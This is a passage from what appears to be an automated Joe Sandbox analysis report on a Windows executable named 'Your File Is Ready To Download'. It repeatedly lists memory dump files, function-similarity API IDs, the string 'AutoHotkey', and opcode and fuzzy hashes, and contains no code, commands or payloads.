                                                                                                                                                                                                                          • Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Time$File$LocalSystem_errno_invalid_parameter_noinfo
                                                                                                                                                                                                                          • String ID: %04d%02d%02d%02d%02d%02d
                                                                                                                                                                                                                          • API String ID: 261180415-4847443
                                                                                                                                                                                                                          • Opcode ID: 8542bd54ba761e163d0f438b97cc5fb87815d33d9e571f47845f86df1711d679
                                                                                                                                                                                                                          • Instruction ID: fc591ccccb5ec658384044dc44831f944e32bc7d5b9a5f12ea931fda1b58e7d8
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8542bd54ba761e163d0f438b97cc5fb87815d33d9e571f47845f86df1711d679
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F6118432208680C6EB659F15E4403EEB371FB89BA4F144626FBA943AE8DB7DC054DB11
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: IconNotifyShell_wcsncpy
                                                                                                                                                                                                                          • String ID: AutoHotkey
                                                                                                                                                                                                                          • API String ID: 1496823222-348589305
                                                                                                                                                                                                                          • Opcode ID: 88e03fc78e9fa20efee9382104734a557ba2884c4873140b13ee5282d9f532d6
                                                                                                                                                                                                                          • Instruction ID: 7c3b2a7d7b27d2fa6ad9455f20b5cfacfbe0fbc92e48ed228ae84a3ad4c15036
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 88e03fc78e9fa20efee9382104734a557ba2884c4873140b13ee5282d9f532d6
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 292167B2304B80E6EB4DCF62E544799B3A0F748BC0F04912AEB6D47765EF78E5A08700
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: MessageSend
                                                                                                                                                                                                                          • String ID: +
                                                                                                                                                                                                                          • API String ID: 3850602802-2126386893
                                                                                                                                                                                                                          • Opcode ID: 1d063ba8f3d3cd32ba78883b3da571832170b377909a5551c410d314d88c1fd2
                                                                                                                                                                                                                          • Instruction ID: 5aee8a1cfd75c665dd8fe8319e52013841c99d3050363b3424eb9b4d84c5809c
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1d063ba8f3d3cd32ba78883b3da571832170b377909a5551c410d314d88c1fd2
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 18F02B7322458183F3329729A410BAE1692D78D3D6F114124FB810BAF6DE39C8428754
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%